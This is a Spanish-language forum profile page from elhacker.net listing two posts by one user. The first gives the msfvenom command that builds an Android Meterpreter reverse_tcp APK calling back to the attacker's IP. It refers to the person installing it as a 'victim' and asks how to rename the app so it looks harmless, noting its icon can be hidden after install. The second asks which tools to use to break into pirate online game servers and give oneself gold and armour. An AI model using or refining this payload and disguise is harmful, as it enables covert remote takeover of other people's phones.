elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / Duda acerca de hack de android metasploit en: 16 Febrero 2018, 16:20 pm
Hola foreros mi duda es la siguiente, al pasar yo el archivo apk a la victima y lo instala sale como nombre Main Activity y me gustaria saber si se podria cambiar el nombre, ya se que una vez que lo instala lo puedo ocultar con hide_app_icon pero  hay que ser muy ingenuo creo yo para instalar una apk llamada main activity.

El comando para crear la apk es esta
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=8888 R > nombre.apk . Aunque ponga cualquier nombre a la apk, al instalar sale Main Activity me ayudarian a poder cambiar el nombre?.

Desde ya gracias por leer.
2  Seguridad Informática / Hacking / Ayuda como saber hackear un video juego online en: 15 Febrero 2018, 00:29 am
Hola, mi duda es la siguiente que programas necesitaria para poder hackear un videojuego online como seria un World of Warcraft o Lineage2, no hablo de los servidores oficiales sino de los piratas, me gustaria saber como ponerme mas oro y una mejor armadura esas cosas. Por ahi lei que si quieres hackear empieza haciendo algo que te guste y pues a mi me gusta los jvideouegos y me gustaria hackearlos solo que no se que programas usar para encontrar las vulnerabilidades del servidor y modificar sus archivos.

Desde ya gracias por leerme  ;D.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines